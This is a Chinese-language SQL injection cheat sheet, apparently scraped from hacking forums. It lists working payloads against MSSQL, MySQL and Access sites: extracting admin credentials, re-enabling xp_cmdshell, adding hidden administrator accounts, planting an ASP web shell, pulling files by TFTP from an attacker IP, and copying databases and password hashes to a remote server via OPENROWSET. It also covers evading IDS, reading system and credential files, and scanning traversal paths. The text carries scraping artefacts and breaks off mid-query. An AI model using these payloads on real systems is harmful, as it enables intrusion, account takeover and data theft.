|
|
MSSQL 跨库查询(臭要饭的!黑夜)
榨干MS SQL最后一滴血
SQL语句参考及记录集对象详解
关于SQL Server中存储过程
利用 mssql backup 创建webshell
SQL_Injection高级应用
跨站式SQL注入(老凯(laokai))
怪异的SQL注入(AMANL)
SQL Server应用程序中的高级SQL注入(翻译:青野志狼)
如何利用Sql 注入遍历目录
SQL Injection技巧的演练(翻译人: demonalex)
SQL数据库的一些攻击
SQL Injection攻击技术(JSW)
SQL_Injection高级应用(apachy)
SQL注入的不常见方法(桂林老兵)
Backup a shell
谈php+mysql注射语句构造(黑嘿黑·≯Super·Hei)
Advanced SQL Injection with MySQL(angel)
L'injection (My)SQL via PHP
Oracle SQL语言
SQL手工注入大全
前提需要工具:SQL Query Analyzer和SqlExec Sunx Version
==============================================================================================
1.判断有无注入点
; and 1=1 and 1=2
2.猜表一般的表的名称无非是admin adminuser user pass password 等..
and 0<>(select count(*) from *)
and 0<>(select count(*) from admin) —判断是否存在admin这张表
3.猜帐号数目 如果遇到0< 返回正确页面 1<返回错误页面说明帐号数目就是1个
and 0<(select count(*) from admin)
and 1<(select count(*) from admin)
4.猜解字段名称 在len( ) 括号里面加上我们想到的字段名称.
and 1=(select count(*) from admin where len(*)>0)–
and 1=(select count(*) from admin where len(用户字段名称name)>0)
and 1=(select count(*) from admin where len(_blank>密码字段名称password)>0)
5.猜解各个字段的长度 猜解长度就是把>0变换 直到返回正确页面为止
and 1=(select count(*) from admin where len(*)>0)
and 1=(select count(*) from admin where len(name)>6) 错误
and 1=(select count(*) from admin where len(name)>5) 正确 长度是6
and 1=(select count(*) from admin where len(name)=6) 正确
and 1=(select count(*) from admin where len(password)>11) 正确
and 1=(select count(*) from admin where len(password)>12) 错误 长度是12
and 1=(select count(*) from admin where len(password)=12) 正确
6.猜解字符
and 1=(select count(*) from admin where left(name,1)=a) —猜解用户帐号的第一位
and 1=(select count(*) from admin where left(name,2)=ab)—猜解用户帐号的第二位
就这样一次加一个字符这样猜,猜到够你刚才猜出来的多少位了就对了,帐号就算出来了
(1)猜表名
所用语句:
and exists (select * from 表名)
例如:
and exists (select * from admin)
如果页面回显正确,则说明我们这里猜的表名是正确的,如果页面出错,那么就说明我们这里写的表名是错误
的,那就换一个表名继续猜,一直到猜中为止。
一般的,常用的表名有admin,manage,user,或者放到工具跑
(2)猜字段
所用语句:
and exists (select 字段名 from 表名)
例如:
and exists (select username from admin)
这里,假设admin表是我上边猜对了的表,那么我要判断username字段是否存在,就要使用这条语句,如果页
面回显正确,则说明我们这里猜的字段名是正确的,如果页面出错,那么就说明我们这里写的字段名是错误的
,那就换一个字段名继续猜,一直到猜中为止。
一般的,常见的字段名有username,password,user,pass,name,pass,pwd,usr,psd等字段
(3)order by
order by 是为了获得该页面上的字段数的总和,为下一步的联合查询做准备
(4)联合查询(union select)
1,如果支持联合查询,找出显示位http://www.xxx.com/product_show.asp?id=1 and 1=2 union select
1,2,3,4,5,6,7,8,9,10,11
假设显示位是5,6。我们接下来只需要把管理员的用户名和密码对应的字段名替换掉这里显示位的位置
http://www.xxx.com/product_show.asp?id=1 and 1=2 union select
1,2,3,4,admin_name,admin_pwd,7,8,9,10,11 from admin找到后台登陆
2,如果不支持联合查询
不可以联合查询的情况下拿到管理员的用户名和密码- -使用Ascii逐字解码法
二,
利用 order by 判断表的位数,如果不行就用union select 逐个的排,这里假设是8位
三,
用联合查询来判断显示位
四,
利用显示位找到数据库名,数据库版本,5.0以上的可以注入
http://www.xxx.com/news_detail.php?newsid=-1+union+select+1,2,3,4,5,6,concat(database
(),0x5c,user(),0x5c,
version()),8
五,
有了数据库名就开始得到表名schema=后面就是数据库名称的HEX值,猜解表名
http://www.xxx.com/news_detail.php?newsid=-1+union+select+1,2,3,4,5,6,GROUP_CONCAT(DISTINCT
+table_name),8
+from+information_schema.columns+where+
table_schema=0x666C6965725F6462617365
六
分析出来的表名,判断管理员的表name=表名的HEX值,猜解表内的字段
http://www.xxx.com/news_detail.php?newsid=-1+union+select+1,2,3,4,5,6,GROUP_CONCAT(DISTINCT
+column_name),8+
from+information_schema.columns+where+table_name=0x7075625F7765626D6173746572
七,
得到了管理员表的字段之后,再来获取字段的内容
http://www.xxx.com/news_detail.php?newsid=-1+union+select+1,2,3,4,5,6,GROUP_CONCAT(DISTINCT
+username,
0x5f,userpwd),8+from+pub_webmaster
八
工具扫描后台:找到后登陆上传木马,如果找不到访问robots.txt文件
九,
如果找不到后台,爆MYSQL管理员的口令
http://www.xxx.com/news_detail.php?newsid=-1+union+select+1,2,3,4,5,6,concat
(user,password),8+from+mysql.user
十,
随便访问一个路径,反馈的是IIS6的404默认页,说明网站服务器是:Windows+IIS6+php+MySql的环境
c:\\windows\\system32\\inetsrv\\MetaBase.xml这个路径就可以获取网站配置信息了。
构造语句http://www.xxx.com/news_detail.php?newsid=-1+union+select+1,2,3,4,5,6,load_file
(0x633A5C5C77696E646F77735C
5C73797374656D33325C5C696E65747372765C5C4D657461426173652E786D6C),8
十一,
分析代码,找后台地址
第一步,我们需要获得表中字段的长度
使用的语句:
and (select top 1 len(字段名) from 表名)>0
比如:
and (select top 1 len(admin_name) from admin)>0
页面显示正常,说明字段admin_name的长度是大于0的,我再提交:
http://www.xxx.com/display1_new.asp?id=108 and (select top 1 len(admin_name) from admin)>10
页面显示错误说明了字段在0到10之间,用二分法求得长度为5
以同样的方法判断出管理员的密码的字段的长度,我得到的长度为16
第二步
判断出了两个字段的长度,现在我们进行第二步,截取字段中的某个字符,并得到该字符的ASCII码,使用的
语句:
and (select top 1 asc(mid(字段名,N,1)) from 表名)>0
我把这句话分开来看,首先,最里边的mid(username,1,1)函数,这个是截取admin_name字段的第一个字符,N
表示要截取第几个字符,
然后外边的asc()函数,这个是将mid函数截取到的字符转换成ASCII码,最外边的top 1,表示返回字段中的第
一条记录,然后,
最后边的“>0”,是将这个转换出的ASCII码与这个数字相比较,通过不断变换最后的这个数值,最终得出截
取到的这个字符的具体的
ASCII码
提交:
http://www.xxx.com/display1_new.asp?id=108 and (select top 1 asc(mid(admin_name,1,1)) from
admin)>30
页面显示正常,说明这个字符的ASCII码是大于30的。
提交:
http://www.xxx.com/display1_new.asp?id=108 and (select top 1 asc(mid(admin_name,1,1)) from
admin)>90
页面显示正常,说明这个字符的ASCII码是大于90的。
http://www.xxx.com/display1_new.asp?id=108 and (select top 1 asc(mid(admin_name,1,1)) from
admin)=97
最终我得出的这个字符的ASCII码是97
对照一下ASCII表:
可以得出第一个字符是“a”。
然后我再来判断第二个字符的ASCII码。
http://www.xxx.com/display1_new.asp?id=108 and (select top 1 asc(mid(admin_name,2,1)) from
admin)>90
页面显示正常,说明该字符的ASCII码是大于90的,一直换最后的这个数值
同样的方法得出管理员的密码了,我最终得出的结果为:
http://www.xxx.com/display1_new.asp?id=108 and (select top 1 asc(mid(admin_pass,1,1)) from
admin)=52
and 1=(select top 1 count(*) from Admin where Asc(mid(pass,5,1))=51) –
这个查询语句可以猜解中文的用户和_blank>密码.只要把后面的数字换成中文的 ASSIC码就OK.最后把结果再
转换成字符.
group by users.id having 1=1–www.myhack58.com
group by users.id, users.username, users.password, users.privs having 1=1–
; insert into users values( 666, attacker, foobar, 0xffff )–
UNION Select TOP 1 COLUMN_blank>_NAME FROM INFORMATION_blank>_SCHEMA.COLUMNS Where
TABLE_blank>_NAME=logintable-
UNION Select TOP 1 COLUMN_blank>_NAME FROM INFORMATION_blank>_SCHEMA.COLUMNS Where
TABLE_blank>_NAME=logintable Where COLUMN_blank>_NAME NOT IN (login_blank>_id)-
UNION Select TOP 1 COLUMN_blank>_NAME FROM INFORMATION_blank>_SCHEMA.COLUMNS Where
TABLE_blank>_NAME=logintable Where COLUMN_blank>_NAME NOT IN
(login_blank>_id,login_blank>_name)-
UNION Select TOP 1 login_blank>_name FROM logintable-
UNION Select TOP 1 password FROM logintable where login_blank>_name=Rahul–
看_blank>服务器打的补丁=出错了打了SP4补丁黑吧安全网
and 1=(select @@VERSION)–
看_blank>数据库连接账号的权限,返回正常,证明是 _blank>服务器角色sysadmin权限。
and 1=(Select IS_blank>_SRVROLEMEMBER(sysadmin))–
判断连接_blank>数据库帐号。(采用SA账号连接 返回正常=证明了连接账号是SA)
and sa=(Select System_blank>_user)–
and user_blank>_name()=dbo–
and 0<>(select user_blank>_name()–
看xp_blank>_cmdshell是否删除
and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = X AND name = xp_blank>_cmdshell)
–
xp_blank>_cmdshell被删除,恢复,支持绝对路径的恢复
;EXEC master.dbo.sp_blank>_addextendedproc xp_blank>_cmdshell,xplog70.dll–
;EXEC master.dbo.sp_blank>_addextendedproc xp_blank>_cmdshell,c:\inetpub\wwwroot\xplog70.dll–
==============================DB权限暴出网站物理路径代码
==========================================================================
1、drop table [jm_tmp];create table [jm_tmp](value navrchar(4000) null,data nvarchar(4000)
null)-- 创建表
2、 delete [jm_tmp];insert [jm_tmp] exec master.dbo.xp_regread
’HKEY_LOCAL_MACHINE’,’SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots’,’/’--
将网站目录插到表字段中
3、and (select top 1 cast([data] as nvarchar(4000) char(124) from [jm_tmp] order by [data]
desc)=0 ’//暴出字段
4、drop table [jm_tmp]-- 删除此表。
for命令获取shell
/c for /r e:\ %i in ("<%eval request("cmd")%>") do @echo %i
>>d:\其他站路径
======================load_file() 常用敏感信息===========================================
1、 replace(load_file(0×2F6574632F706173737764),0×3c,0×20)
2、replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))
上面两个是查看一个PHP文件里完全显示代码.有些时候不替换一些字符,如 “<” 替换成”空格” 返回的是
网页.而无法查看到代码.
3、 load_file(char(47)) 可以列出FreeBSD,Sunos系统根目录
4、/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件
5、c:\Program Files\Apache Group\Apache\conf\httpd.conf 或C:\apache\conf\httpd.conf 查看WINDOWS
系统apache文件
6、c:/Resin-3.0.14/conf/resin.conf 查看jsp开发的网站 resin文件配置信息.
7、c:/Resin/conf/resin.conf /usr/local/resin/conf/resin.conf 查看linux系统配置的JSP虚拟主机
8、d:\APACHE\Apache2\conf\httpd.conf
9、C:\Program Files\mysql\my.ini
10、../themes/darkblue_orange/layout.inc.php phpmyadmin 爆路径
11、 c:\windows\system32\inetsrv\MetaBase.xml 查看IIS的虚拟主机配置文件
12、 /usr/local/resin-3.0.22/conf/resin.conf 针对3.0.22的RESIN配置文件查看
13、 /usr/local/resin-pro-3.0.22/conf/resin.conf 同上
14 、/usr/local/app/apache2/conf/extratpd-vhosts.conf APASHE虚拟主机查看
15、 /etc/sysconfig/iptables 本看防火墙策略
16 、 /usr/local/app/php5 b/php.ini PHP 的相当设置
17 、/etc/my.cnf MYSQL的配置文件
18、 /etc/redhat-release 红帽子的系统版本
19 、C:\mysql\data\mysql\user.MYD 存在MYSQL系统中的用户密码
20、/etc/sysconfig/network-scrip{过滤}ts/ifcfg-eth0 查看IP.
21、/usr/local/app/php5 b/php.ini //PHP相关设置
22、/usr/local/app/apache2/conf/extratpd-vhosts.conf //虚拟网站设置
23、c:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini
24、c:\windows\my.ini
25、/etc/issue 显示Linux核心的发行版本信息
26、/etc/ftpuser
27、查看LINUX用户下的操作记录文件.bash_history 或 .bash_profile
28、/etc/ssh/ssh_config
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/etc/httpd/logs/access_log
/etc/httpd/logs/access.log
/var/log/apache/error_log
/var/log/apache/error.log
/var/log/apache/access_log
/var/log/apache/access.log
/var/log/apache2/error_log
/var/log/apache2/error.log
/var/log/apache2/access_log
/var/log/apache2/access.log
/var/www/logs/error_log
/var/www/logs/error.log
/var/www/logs/access_log
/var/www/logs/access.log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/var/log/error_log
/var/log/error.log
/var/log/access_log
/var/log/access.log
/etc/mail/access
/etc/my.cnf
/var/run/utmp
/var/log/wtmp
../../../../../../../../../../var/log/httpd/access_log
../../../../../../../../../../var/log/httpd/error_log
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../../../../../../../etc/httpd/logs/acces_log
../../../../../../../../../../etc/httpd/logs/acces.log
../../../../../../../../../../etc/httpd/logs/error_log
../../../../../../../../../../etc/httpd/logs/error.log
../../../../../../../../../../var/www/logs/access_log
../../../../../../../../../../var/www/logs/access.log
../../../../../../../../../../usr/local/apache/logs/access_log
../../../../../../../../../../usr/local/apache/logs/access.log
../../../../../../../../../../var/log/apache/access_log
../../../../../../../../../../var/log/apache/access.log
../../../../../../../../../../var/log/access_log
../../../../../../../../../../var/www/logs/error_log
../../../../../../../../../../var/www/logs/error.log
../../../../../../../../../../usr/local/apache/logs/error_log
../../../../../../../../../../usr/local/apache/logs/error.log
../../../../../../../../../../var/log/apache/error_log
../../../../../../../../../../var/log/apache/error.log
../../../../../../../../../../var/log/access_log
../../../../../../../../../../var/log/error_log
/var/log/httpd/access_log
/var/log/httpd/error_log
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
/etc/httpd/logs/acces_log
/etc/httpd/logs/acces.log
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/var/www/logs/access_log
/var/www/logs/access.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/var/log/apache/access_log
/var/log/apache/access.log
/var/log/access_log
/var/www/logs/error_log
/var/www/logs/error.log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error.log
/var/log/apache/error_log
/var/log/apache/error.log
/var/log/access_log
/var/log/error_log
========================================================
反向PING自己实验
;use master;declare @s int;exec sp_blank>_oacreate “wscrip{过滤}t.shell”,@s out;exec
sp_blank>_oamethod @s,”run”,NULL,”cmd.exe /c ping 192.168.0.1″;–
加帐号
;DECLARE @shell INT EXEC SP_blank>_OACreate wscrip{过滤}t.shell,@shell OUTPUT EXEC SP_blank>_OAMETHOD
@shell,run,null, C:\WINNT\system32\cmd.exe /c net user jiaoniang$ 1866574 /add–
创建一个虚拟目录E盘:
;declare @o int exec sp_blank>_oacreate wscrip{过滤}t.shell, @o out exec sp_blank>_oamethod @o, run,
NULL, cscrip{过滤}t.exe c:\inetpub\wwwroot\mkwebdir.vbs -w “默认Web站点” -v “e”,”e:\”–
访问属性:(配合写入一个webshell)
declare @o int exec sp_blank>_oacreate wscrip{过滤}t.shell, @o out exec sp_blank>_oamethod @o, run,
NULL, cscrip{过滤}t.exe c:\inetpub\wwwroot\chaccess.vbs -a w3svc/1/ROOT/e +browse
爆库 特殊_blank>技巧::%5c=\ 或者把/和\ 修改%5提交
and 0<>(select top 1 paths from newtable)–
得到库名(从1到5都是系统的id,6以上才可以判断)
and 1=(select name from master.dbo.sysdatabases where dbid=7)–
and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)
依次提交 dbid = 7,8,9…. 得到更多的_blank>数据库名
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=U) 暴到一个表 假设为 admin
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=U and name not in (Admin)) 来得到
其他的表。
and 0<>(select count(*) from bbs.dbo.sysobjects where xtype=U and name=admin
and uid>(str(id))) 暴到UID的数值假设为18779569 uid=id
and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569) 得到一个admin的一个字段,假
设为 user_blank>_id
and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569 and name not in
(id,…)) 来暴出其他的字段
and 0<(select user_blank>_id from BBS.dbo.admin where username>1) 可以得到用户名
依次可以得到_blank>密码。。。。。假设存在 user_blank>_id username ,password 等字段
and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=U) 得到表名
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=U and name not in(Address))
and 0<>(select count(*) from bbs.dbo.sysobjects where xtype=U and name=admin and uid>(str(id)))
判断id值
and 0<>(select top 1 name from BBS.dbo.syscolumns where id=773577794) 所有字段
?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin
?id=-1 union select 1,2,3,4,5,6,7,8,*,9,10,11,12,13 from admin (union,access也好用)
得到WEB路径
;create table [dbo].[swap] ([swappass][char](255));–
and (select top 1 swappass from swap)=1–
;Create TABLE newtable(id int IDENTITY(1,1),paths varchar(500)) Declare @test varchar(20) exec
master..xp_blank>_regread @rootkey=HKEY_blank>_LOCAL_blank>_MACHINE, @key=SYSTEM
\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\, @value_blank>_name=/, values=@test
OUTPUT insert into paths(path) values(@test)–
;use ku1;–
;create table cmd (str image);– 建立image类型的表cmd
1.去掉xp_cmdshell扩展过程的方法是使用如下语句:
if exists (select * from dbo.sysobjects where id=object_id(N'[dbo].[xpcmdshell]') and
OBJECTPROPERTY(id,N'IsExtendedProc')=1)
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
2.添加xp_cmdshell扩展过程的方法是使用如下语句:
(1)SQL Query Analyzer
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
(2)首先在SqlExec Sunx Version的Format选项里填上%s,在CMD选项里输入
sp_addextendedproc 'xp_cmdshell','xpsql70.dll'
去除
sp_dropextendedproc 'xp_cmdshell'
(3)MSSQL2000
sp_addextendedproc 'xp_cmdshell','xplog70.dll'
存在xp_blank>_cmdshell的测试过程:
;exec master..xp_blank>_cmdshell dir
;exec master.dbo.sp_blank>_addlogin jiaoniang$;– 加SQL帐号
;exec master.dbo.sp_blank>_password null,jiaoniang$,1866574;–
;exec master.dbo.sp_blank>_addsrvrolemember jiaoniang$ sysadmin;–
;exec master.dbo.xp_blank>_cmdshell net user jiaoniang$ 1866574 /workstations:* /times:all
/passwordchg:yes /passwordreq:yes /active:yes /add;–
;exec master.dbo.xp_blank>_cmdshell net localgroup administrators jiaoniang$ /add;–
exec master..xp_blank>_servicecontrol start, schedule 启动_blank>服务
exec master..xp_blank>_servicecontrol start, server
; DECLARE @shell INT EXEC SP_blank>_OACreate wscrip{过滤}t.shell,@shell OUTPUT EXEC SP_blank>_OAMETHOD
@shell,run,null, C:\WINNT\system32\cmd.exe /c net user jiaoniang$ 1866574 /add
;DECLARE @shell INT EXEC SP_blank>_OACreate wscrip{过滤}t.shell,@shell OUTPUT EXEC SP_blank>_OAMETHOD
@shell,run,null, C:\WINNT\system32\cmd.exe /c net localgroup administrators jiaoniang$ /add
; exec master..xp_blank>_cmdshell tftp -i youip get file.exe– 利用TFTP上传文件
;declare @a sysname set @a=xp_blank>_+cmdshell exec @a dir c:\
;declare @a sysname set @a=xp+_blank>_cm’+’dshell exec @a dir c:\
;declare @a;set @a=db_blank>_name();backup database @a to disk=你的IP你的共享目录bak.dat
如果被限制则可以。
select * from openrowset(_blank>sqloledb,server;sa;,select OK! exec
master.dbo.sp_blank>_addlogin hax)
查询构造:
Select * FROM news Where id=… AND topic=… AND …..
adminand 1=(select count(*) from [user] where username=victim and right(left(userpass,01),1)=1)
and userpass <>
select 123;–
;use master;–
:a or name like fff%;– 显示有一个叫ffff的用户哈。
and 1<>(select count(email) from [user]);–
;update [users] set email=(select top 1 name from sysobjects where xtype=u and status>0) where
name=ffff;–
;update [users] set email=(select top 1 id from sysobjects where xtype=u and name=ad) where
name=ffff;–
;update [users] set email=(select top 1 name from sysobjects where xtype=u and id>581577110)
where name=ffff;–
;update [users] set email=(select top 1 count(id) from password) where name=ffff;–
;update [users] set email=(select top 1 pwd from password where id=2) where name=ffff;–
;update [users] set email=(select top 1 name from password where id=2) where name=ffff;–
上面的语句是得到_blank>数据库中的第一个用户表,并把表名放在ffff用户的邮箱字段中。
通过查看ffff的用户资料可得第一个用表叫ad
然后根据表名 ad得到这个表的ID 得到第二个表的名字
insert into users values( 666, char(0×63)+char(0×68)+char(0×72)+char(0×69)+char(0×73),
char(0×63)+char(0×68)+char(0×72)+char(0×69)+char(0×73), 0xffff)–
insert into users values( 667,123,123,0xffff)–
insert into users values ( 123, admin–, password, 0xffff)–
;and user>0
;and (select count(*) from sysobjects)>0
;and (select count(*) from mysysobjects)>0 //为access_blank>数据库
枚举出数据表名
;update aaa set aaa=(select top 1 name from sysobjects where xtype=u and status>0);–
这是将第一个表名更新到aaa的字段处。
读出第一个表,第二个表可以这样读出来(在条件后加上 and name<>刚才得到的表名)。
;update aaa set aaa=(select top 1 name from sysobjects where xtype=u and status>0 and
name<>vote);–
然后id=1552 and exists(select * from aaa where aaa>5)
读出第二个表,一个个的读出,直到没有为止。
读字段是这样:
;update aaa set aaa=(select top 1 col_blank>_name(object_blank>_id(表名),1));–
然后id=152 and exists(select * from aaa where aaa>5)出错,得到字段名
;update aaa set aaa=(select top 1 col_blank>_name(object_blank>_id(表名),2));–
然后id=152 and exists(select * from aaa where aaa>5)出错,得到字段名
[获得数据表名][将字段值更新为表名,再想法读出这个字段的值就可得到表名]
update 表名 set 字段=(select top 1 name from sysobjects where xtype=u and status>0 [ and name<>
你得到的表名 查出一个加一个]) [ where 条件] select top 1 name from sysobjects where xtype=u and
status>0 and name not in(table1,table2,…)
通过SQLSERVER注入_blank>漏洞建_blank>数据库管理员帐号和系统管理员帐号[当前帐号必须是SYSADMIN组]
[获得数据表字段名][将字段值更新为字段名,再想法读出这个字段的值就可得到字段名]
update 表名 set 字段=(select top 1 col_blank>_name(object_blank>_id(要查询的数据表名),字段列
如:1) [ where 条件]
绕过IDS的检测[使用变量]
;declare @a sysname set @a=xp_blank>_+cmdshell exec @a dir c:\
;declare @a sysname set @a=xp+_blank>_cm’+’dshell exec @a dir c:\
1、 开启远程_blank>数据库
基本语法
select * from OPENROWSET(SQLOLEDB, server=servername;uid=sa;pwd=123, select * from table1 )
参数: (1) OLEDB Provider name
2、 其中连接字符串参数可以是任何端口用来连接,比如
select * from OPENROWSET(SQLOLEDB, uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,
select * from table
3.复制目标主机的整个_blank>数据库insert所有远程表到本地表。
基本语法:
insert into OPENROWSET(SQLOLEDB, server=servername;uid=sa;pwd=123, select * from table1) select
* from table2
这行语句将目标主机上table2表中的所有数据复制到远程_blank>数据库中的table1表中。实际运用中适当修
改连接字符串的IP地址和端口,指向需要的地方,比如:
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select
* from table1) select * from table2
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select
* from _blank>_sysdatabases)
select * from master.dbo.sysdatabases
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select
* from _blank>_sysobjects)
select * from user_blank>_database.dbo.sysobjects
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select
* from _blank>_syscolumns)
select * from user_blank>_database.dbo.syscolumns
复制_blank>数据库:
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select
* from table1) select * from database..table1
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select
* from table2) select * from database..table2
复制哈西表(HASH)登录_blank>密码的hash存储于sysxlogins中。方法如下:
insert into OPENROWSET(SQLOLEDB,
uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _blank>_sysxlogins)
select * from database.dbo.sysxlogins
得到hash之后,就可以进行暴力破解。
遍历目录的方法: 先创建一个临时表:temp
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));–
;insert temp exec master.dbo.xp_blank>_availablemedia;– 获得当前所有驱动器
;insert into temp(id) exec master.dbo.xp_blank>_subdirs c:\;– 获得子目录列表
;insert into temp(id,num1) exec master.dbo.xp_blank>_dirtree c:\;– 获得所有子目录的目录树结构,
并寸入temp表中
;insert into temp(id) exec master.dbo.xp_blank>_cmdshell type c:\web\index.asp;– 查看某个文件的
内容
;insert into temp(id) exec master.dbo.xp_blank>_cmdshell dir c:\;–
;insert into temp(id) exec master.dbo.xp_blank>_cmdshell dir c:\ *.asp /s/a;–
;insert into temp(id) exec master.dbo.xp_blank>_cmdshell cscrip{过滤}t C:\Inetpub\Adminscrip{过滤}ts
\adsutil.vbs enum w3svc
;insert into temp(id,num1) exec master.dbo.xp_blank>_dirtree c:\;– (xp_blank>_dirtree适用权限
PUBLIC)
写入表:
语句1:and 1=(Select IS_blank>_SRVROLEMEMBER(sysadmin));–
语句2:and 1=(Select IS_blank>_SRVROLEMEMBER(serveradmin));–
语句3:and 1=(Select IS_blank>_SRVROLEMEMBER(setupadmin));–
语句4:and 1=(Select IS_blank>_SRVROLEMEMBER(securityadmin));–
语句5:and 1=(Select IS_blank>_SRVROLEMEMBER(securityadmin));–
语句6:and 1=(Select IS_blank>_SRVROLEMEMBER(diskadmin));–
语句7:and 1=(Select IS_blank>_SRVROLEMEMBER(bulkadmin));–
语句8:and 1=(Select IS_blank>_SRVROLEMEMBER(bulkadmin));–
语句9:and 1=(Select IS_blank>_MEMBER(db_blank>_owner));–
把路径写到表中去:
;create table dirs(paths varchar(100), id int)–
;insert dirs exec master.dbo.xp_blank>_dirtree c:\–
and 0<>(select top 1 paths from dirs)–
and 0<>(select top 1 paths from dirs where paths not in(@Inetpub))–
;create table dirs1(paths varchar(100), id int)–
;insert dirs exec master.dbo.xp_blank>_dirtree e:\web–
and 0<>(select top 1 paths from dirs1)–
把_blank>数据库备份到网页目录:下载
;declare @a sysname; set @a=db_blank>_name();backup database @a to disk=e:\web\down.bak;–
and 1=(Select top 1 name from(Select top 12 id,name from sysobjects where xtype=char(85)) T
order by id desc)
and 1=(Select Top 1 col_blank>_name(object_blank>_id(USER_blank>_LOGIN),1) from sysobjects) 参看
相关表。
and 1=(select user_blank>_id from USER_blank>_LOGIN)
and 0=(select user from USER_blank>_LOGIN where user>1)
-=- wscrip{过滤}t.shell example -=-
declare @o int
exec sp_blank>_oacreate wscrip{过滤}t.shell, @o out
exec sp_blank>_oamethod @o, run, NULL, notepad.exe
; declare @o int exec sp_blank>_oacreate wscrip{过滤}t.shell, @o out exec sp_blank>_oamethod @o, run,
NULL, notepad.exe–
declare @o int, @f int, @t int, @ret int
declare @line varchar(8000)
exec sp_blank>_oacreate scrip{过滤}ting.filesystemobject, @o out
exec sp_blank>_oamethod @o, opentextfile, @f out, c:\boot.ini, 1
exec @ret = sp_blank>_oamethod @f, readline, @line out
while( @ret = 0 )
begin
print @line
exec @ret = sp_blank>_oamethod @f, readline, @line out
end
declare @o int, @f int, @t int, @ret int
exec sp_blank>_oacreate scrip{过滤}ting.filesystemobject, @o out
exec sp_blank>_oamethod @o, createtextfile, @f out, c:\inetpub\wwwroot\foo.asp, 1
exec @ret = sp_blank>_oamethod @f, writeline, NULL,
<% set o = server.createobject(“wscrip{过滤}t.shell”): o.run( request.querystring(“cmd”) ) %>
declare @o int, @ret int
exec sp_blank>_oacreate speech.voicetext, @o out
exec sp_blank>_oamethod @o, register, NULL, foo, bar
exec sp_blank>_oasetproperty @o, speed, 150
exec sp_blank>_oamethod @o, speak, NULL, all your sequel servers are belong to,us, 528
waitfor delay 00:00:05
; declare @o int, @ret int exec sp_blank>_oacreate speech.voicetext, @o out exec
sp_blank>_oamethod @o, register, NULL, foo, bar exec sp_blank>_oasetproperty @o, speed, 150 exec
sp_blank>_oamethod @o, speak, NULL, all your sequel servers are belong to us, 528 waitfor delay
00:00:05–
xp_blank>_dirtree适用权限PUBLIC
exec master.dbo.xp_blank>_dirtree c:返回的信息有两个字段subdirectory、depth。Subdirectory字段是
字符型,depth字段是整形字段。
create table dirs(paths varchar(100), id int)
建表,这里建的表是和上面 xp_blank>_dirtree相关连,字段相等、类型相同。
insert dirs exec master.dbo.xp_blank>_dirtree c:只要我们建表与存储进程返回的字段相定义相等就能够
执行!达到写表的效果,一步步达到我们想要的信息!
这种报错注入主要基于Mysql数据类型溢出
mysql > SELECT 18446744073709551610 * 2 ;
ERROR 1690 ( 22003 ): BIGINT UNSIGNED value is out of range in '(18446744073709551610 * 2)'
mysql > SELECT - 1 * 9223372036854775808 ;
ERROR 1690 ( 22003 ): BIGINT UNSIGNED value is out of range in '(- (1) *
9223372036854775808)'
查询数据库版本:
mysql> SELECT * 2 (if ((SELECT * from (SELECT (version ()) ) s), 18446744073709551610,
18446744073709551610));
ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '(2 * if (( Select ' 5.5 'from
Dual), 18446744073709551610.18446744073709551610))'
获取字段名称:
mysql> SELECT 2 * if((SELECT * from (select * from test.shop) as `` limit 1)>(SELECT * from
test.shop limit 1), 18446744073709551610, 18446744073709551610);
ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '(2 * if(((select
`article`,`dealer`,`price` from (select `test`.`shop`.`article` AS
`article`,`test`.`shop`.`dealer` AS `dealer`,`test`.`shop`.`price` AS `price` from
`test`.`shop`) limit 1) > (select
`test`.`shop`.`article`,`test`.`shop`.`dealer`,`test`.`shop`.`price` from `test`.`shop` limit
1)),18446744073709551610,18446744073709551610))'
获取字段值:
mysql> SELECT 2 * if((SELECT * from (select * from (mysql.user) LIMIT 1) as `` limit 1) <
